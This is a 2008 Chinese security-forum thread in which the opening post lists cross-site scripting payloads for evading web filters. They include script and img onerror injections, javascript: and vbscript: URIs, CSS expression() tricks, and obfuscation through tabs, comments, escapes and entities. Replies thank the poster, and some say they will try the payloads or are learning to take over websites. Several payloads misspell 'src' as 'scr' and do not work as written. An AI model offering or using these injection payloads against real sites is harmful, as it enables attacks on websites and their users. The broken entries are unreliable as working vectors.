标题:
总结整理出来的一些跨站代码
[打印本页]
作者:
柔肠寸断
时间:
2008-8-6 23:54
标题:
总结整理出来的一些跨站代码
<script>alert("跨站")</script> (最常用)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">
作者:
劳资是怪物
时间:
2008-8-7 15:51
偷了,,,去试试。。:)
作者:
54subiao
时间:
2008-8-7 22:58
现在对这方面还不懂。
不知等我C 有小成之后是不是能搞得明白:call: :call:
作者:
hackrui
时间:
2008-8-15 15:02
恩..这个不错..
作者:
无道亦道
时间:
2008-8-16 20:18
看不懂 先收藏下 :D
作者:
3ast
时间:
2009-2-9 15:48
收藏了咯
作者:
skyme
时间:
2009-4-18 11:05
试试!谢谢楼主啊
作者:
EndTo偌枫
时间:
2009-7-6 01:19
学习了,,现在正在学习如何拿站
作者:
学徒
时间:
2009-9-18 15:54
不错,看懂了部分,vbjavascript还的学!
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2